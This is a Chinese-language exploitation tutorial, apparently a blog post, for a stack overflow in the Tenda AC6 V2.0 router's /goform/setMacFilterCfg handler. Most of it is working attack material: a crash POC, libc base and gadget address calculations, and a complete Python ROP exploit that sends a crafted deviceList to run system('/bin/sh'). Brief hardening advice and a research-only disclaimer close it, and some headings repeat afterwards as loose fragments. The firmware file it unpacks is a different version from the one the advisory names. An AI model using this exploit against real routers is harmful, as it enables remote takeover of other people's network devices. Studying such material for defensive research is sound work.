CNVD-2025-18743：Tenda AC6V2.0 栈溢出漏洞分析与利用教学<\/h1>

一、漏洞概述<\/h2>
受影响设备<\/strong>：Tenda AC6 无线路由器
受影响版本<\/strong>：V2.0_V15.03.06.23
漏洞类型<\/strong>：栈溢出漏洞
危害等级<\/strong>：高危（可导致拒绝服务或远程代码执行）<\/p>

二、漏洞原理分析<\/h2>
2.1 漏洞触发路径<\/h3>
websFormDefine("setMacFilterCfg", formSetMacFilterCfg) → formSetMacFilterCfg() → set_macfilter_mode(mac_filter_mode) → set_macfilter_rules(mac_filter_mode, rule_list) → set_macfilter_rules_by_one() → parse_macfilter_rule(source_rule, &rule_info) <\/code><\/pre> 2.2 关键漏洞点<\/h3> 在 parse_macfilter_rule<\/code> 函数中存在不安全字符串操作：<\/p> rule_tmp =<\/span> strchr(source_rule, 13<\/span>); \/\/ 查找回车符(\r) <\/span><\/span><\/span>\/\/ ... 其他操作 ... <\/span><\/span><\/span><\/span>strcpy(dest_rule-><\/span>name, source_rule); \/\/ 栈溢出发生点 <\/span><\/span><\/span><\/code><\/pre>2.3 触发条件<\/h3> POST请求 \/goform\/setMacFilterCfg<\/code> 接口<\/li> 参数要求： macFilterType<\/code> 必须为 "white" 或 "black"<\/li> deviceList<\/code> 必须包含回车符 \r<\/code><\/li> <\/ul> <\/li> 通过Cookie进行身份认证：password=1111<\/code><\/li> <\/ol> 三、环境搭建<\/h2> 3.1 网络环境配置<\/h3> #!\/bin\/bash <\/span><\/span><\/span><\/span># 网桥配置脚本<\/span> <\/span><\/span>sudo ifconfig ens33 down <\/span><\/span>sudo brctl addbr br0 <\/span><\/span>sudo brctl addif br0 ens33 <\/span><\/span>sudo brctl stp br0 on <\/span><\/span>sudo brctl setfd br0 2<\/span> <\/span><\/span>sudo brctl sethello br0 1<\/span> <\/span><\/span>sudo ifconfig br0 0.0.0.0 promisc up <\/span><\/span>sudo ifconfig ens33 0.0.0.0 promisc up <\/span><\/span>sudo dhclient br0 <\/span><\/span>sudo brctl show br0 <\/span><\/span>sudo brctl showstp br0 <\/span><\/span>sudo tunctl -t tap0 <\/span><\/span>sudo brctl addif br0 tap0 <\/span><\/span>sudo ifconfig tap0 0.0.0.0 promisc up <\/span><\/span>sudo ifconfig tap0 192.168.50.12\/24 up <\/span><\/span>sudo ifconfig ens33 192.168.50.10\/24 up <\/span><\/span>sudo brctl showstp br0 <\/span><\/span><\/code><\/pre>3.2 固件提取与启动<\/h3> # 解压固件<\/span> <\/span><\/span>binwalk -Me US_AC6V2.0RTL_V15.03.06.51_multi_TDE01.bin <\/span><\/span> <\/span><\/span># 修复web目录<\/span> <\/span><\/span>rm -rf webroot <\/span><\/span>mkdir webroot <\/span><\/span>cp -rf .\/webroot_ro\/* .\/webroot\/ <\/span><\/span>cp $(<\/span>which qemu-mipsel-static)<\/span> .\/ <\/span><\/span>sudo chroot .\/ .\/qemu-mipsel-static .\/bin\/httpd <\/span><\/span><\/code><\/pre>3.3 补丁处理<\/h3> 需对固件进行必要的patch操作以确保正常启动（具体patch方法需参考相关教程）。<\/p> 四、漏洞复现<\/h2> 4.1 基础POC<\/h3> import<\/span> requests <\/span><\/span>from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span>url =<\/span> "http:\/\/192.168.50.18\/goform\/setMacFilterCfg"<\/span> <\/span><\/span>cookie =<\/span> {"Cookie"<\/span>: "password=1111"<\/span>} <\/span><\/span>payload =<\/span> cyclic(500<\/span>) <\/span><\/span> <\/span><\/span>data =<\/span> { <\/span><\/span> "macFilterType"<\/span>: "white"<\/span>, <\/span><\/span> "deviceList"<\/span>: b<\/span>"<\/span>\r<\/span>"<\/span> +<\/span> payload <\/span><\/span>} <\/span><\/span> <\/span><\/span>requests.<\/span>post(url, cookies=<\/span>cookie, data=<\/span>data) <\/span><\/span>requests.<\/span>post(url, cookies=<\/span>cookie, data=<\/span>data) # 发送两次确保触发<\/span> <\/span><\/span><\/code><\/pre>4.2 偏移量计算<\/h3> 启动调试环境：<\/li> <\/ol> # 终端1：启动调试服务<\/span> <\/span><\/span>sudo chroot .\/ .\/qemu-mipsel-static -g 1234<\/span> .\/bin\/httpd <\/span><\/span> <\/span><\/span># 终端2：GDB调试<\/span> <\/span><\/span>gdb-multiarch <\/span><\/span>file .\/bin\/httpd <\/span><\/span>target remote :1234 <\/span><\/span>c <\/span><\/span><\/code><\/pre> 使用cyclic模式确定偏移量：<\/li> <\/ol> payload =<\/span> cyclic(476<\/span>) # 实际偏移量为472（476-4）<\/span> <\/span><\/span><\/code><\/pre>4.3 关键地址计算<\/h3> libc基址计算<\/h4> # 在strcpy处断点：b *0x4E6A24<\/span> <\/span><\/span># 获取strcpy运行时地址：0x3fd62220<\/span> <\/span><\/span># 获取strcpy在libc中的偏移：0x0003d220<\/span> <\/span><\/span>libc_base =<\/span> 0x3fd62220<\/span> -<\/span> 0x0003d220<\/span> # = 0x3FD25000<\/span> <\/span><\/span><\/code><\/pre>system地址计算<\/h4> mipsel-linux-gnu-readelf -s .\/lib\/libc.so.0 | grep system <\/span><\/span># 输出：0x00060320<\/span> <\/span><\/span>system_addr =<\/span> libc_base + 0x00060320 <\/span><\/span><\/code><\/pre>\/bin\/sh地址计算<\/h4> # 在IDA中查找：0x6AE30<\/span> <\/span><\/span>binsh_addr =<\/span> libc_base +<\/span> 0x6AE30<\/span> <\/span><\/span><\/code><\/pre>4.4 ROP链构造<\/h3> Gadget查找<\/h4> Gadget1<\/strong> (libc.so.0):<\/p> .text:00029B34 lw $ra, 0x18+var_s14($sp) .text:00029B38 lw $s4, 0x18+var_s10($sp) .text:00029B3C lw $s3, 0x18+var_sC($sp) .text:00029B40 lw $s2, 0x18+var_s8($sp) .text:00029B44 lw $s1, 0x18+var_s4($sp) .text:00029B48 lw $s0, 0x18+var_s0($sp) .text:00029B4C jr $ra <\/code><\/pre> gadget1 =<\/span> libc_base +<\/span> 0x29B34<\/span> <\/span><\/span><\/code><\/pre>Gadget2<\/strong> (控制参数传递):<\/p> .text:0000DC1C move $a0, $s0 .text:0000DC20 move $t9, $s1 .text:0000DC24 jalr $t9 <\/code><\/pre> gadget2 =<\/span> libc_base +<\/span> 0xDC1C<\/span> <\/span><\/span><\/code><\/pre>可读地址<\/h4> read_base =<\/span> libc_base +<\/span> 0x66C9F<\/span> # 任意可读地址<\/span> <\/span><\/span><\/code><\/pre>4.5 完整攻击载荷<\/h3> import<\/span> requests <\/span><\/span>from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span>url =<\/span> "http:\/\/192.168.50.18\/goform\/setMacFilterCfg"<\/span> <\/span><\/span>cookie =<\/span> {"Cookie"<\/span>: "password=1111"<\/span>} <\/span><\/span> <\/span><\/span># 地址计算<\/span> <\/span><\/span>libc_base =<\/span> 0x3fd62220<\/span> -<\/span> 0x0003d220<\/span> <\/span><\/span>system_addr =<\/span> libc_base +<\/span> 0x00060320<\/span> <\/span><\/span>binsh_addr =<\/span> libc_base +<\/span> 0x6AE30<\/span> <\/span><\/span>gadget1 =<\/span> libc_base +<\/span> 0x29B34<\/span> <\/span><\/span>gadget2 =<\/span> libc_base +<\/span> 0xDC1C<\/span> <\/span><\/span>read_base =<\/span> libc_base +<\/span> 0x66C9F<\/span> <\/span><\/span> <\/span><\/span># 构造ROP链<\/span> <\/span><\/span>payload =<\/span> b<\/span>"Q"<\/span> *<\/span> 472<\/span> <\/span><\/span>payload +=<\/span> p32(gadget1) <\/span><\/span>payload +=<\/span> p32(read_base) # 覆盖$ra<\/span> <\/span><\/span>payload +=<\/span> b<\/span>"BBBB"<\/span> # 覆盖$s4<\/span> <\/span><\/span>payload +=<\/span> b<\/span>"CCCC"<\/span> # 覆盖$s3<\/span> <\/span><\/span>payload +=<\/span> b<\/span>"DDDD"<\/span> # 覆盖$s2<\/span> <\/span><\/span>payload +=<\/span> b<\/span>"EEEE"<\/span> # 覆盖$s1<\/span> <\/span><\/span>payload +=<\/span> b<\/span>"FFFF"<\/span> # 覆盖$s0<\/span> <\/span><\/span>payload +=<\/span> p32(binsh_addr) # $s0 = \/bin\/sh<\/span> <\/span><\/span>payload +=<\/span> p32(system_addr) # $s1 = system<\/span> <\/span><\/span>payload +=<\/span> b<\/span>"A"<\/span> *<\/span> 12<\/span> # 填充<\/span> <\/span><\/span>payload +=<\/span> p32(gadget2) # 跳转到gadget2<\/span> <\/span><\/span> <\/span><\/span>data =<\/span> { <\/span><\/span> "macFilterType"<\/span>: "black"<\/span>, <\/span><\/span> "deviceList"<\/span>: b<\/span>"<\/span>\r<\/span>"<\/span> +<\/span> payload <\/span><\/span>} <\/span><\/span> <\/span><\/span>requests.<\/span>post(url, cookies=<\/span>cookie, data=<\/span>data) <\/span><\/span>requests.<\/span>post(url, cookies=<\/span>cookie, data=<\/span>data) <\/span><\/span><\/code><\/pre>五、漏洞利用要点<\/h2> 触发条件<\/strong>：必须发送两次POST请求才能确保触发漏洞<\/li> 偏移计算<\/strong>：实际偏移量为472字节（cyclic计算值为476，包含4字节返回地址）<\/li> 寄存器控制<\/strong>： $s0 需要指向 "\/bin\/sh" 字符串地址<\/li> $s1 需要指向 system() 函数地址<\/li> <\/ul> <\/li> 栈平衡<\/strong>：需要精心构造栈布局确保正确跳转<\/li> <\/ol> 六、防护建议<\/h2> 输入验证：对deviceList<\/code>参数进行长度检查和内容过滤<\/li> 安全函数：使用strncpy<\/code>替代strcpy<\/code>，并指定最大长度<\/li> 栈保护：启用栈保护机制（如CANARY）<\/li> 地址随机化：启用ASLR保护<\/li> <\/ol> 七、技术总结<\/h2> 该漏洞属于典型的栈溢出漏洞，通过精心构造的ROP链可实现远程代码执行<\/li> MIPS架构的漏洞利用需要特别注意寄存器传递规则和栈平衡<\/li> 成功利用需要准确计算各种偏移量和地址<\/li> 此类漏洞在嵌入式设备中较为常见，需加强输入验证和安全编码实践<\/li> <\/ol> 注：本文仅用于安全研究和教学目的，请勿用于非法用途。<\/em><\/p>

CNVD-2025-18743：Tenda AC6V2.0 栈溢出漏洞分析与利用教学<\/h1>

一、漏洞概述<\/h2> 受影响设备<\/strong>：Tenda AC6 无线路由器 受影响版本<\/strong>：V2.0_V15.03.06.23 漏洞类型<\/strong>：栈溢出漏洞 危害等级<\/strong>：高危（可导致拒绝服务或远程代码执行）<\/p>

三、环境搭建<\/h2>

3.3 补丁处理<\/h3> 需对固件进行必要的patch操作以确保正常启动（具体patch方法需参考相关教程）。<\/p>

四、漏洞复现<\/h2>

4.3 关键地址计算<\/h3>

4.4 ROP链构造<\/h3>

一、漏洞概述<\/h2>
受影响设备<\/strong>：Tenda AC6 无线路由器
受影响版本<\/strong>：V2.0_V15.03.06.23
漏洞类型<\/strong>：栈溢出漏洞
危害等级<\/strong>：高危（可导致拒绝服务或远程代码执行）<\/p>

3.3 补丁处理<\/h3>
需对固件进行必要的patch操作以确保正常启动（具体patch方法需参考相关教程）。<\/p>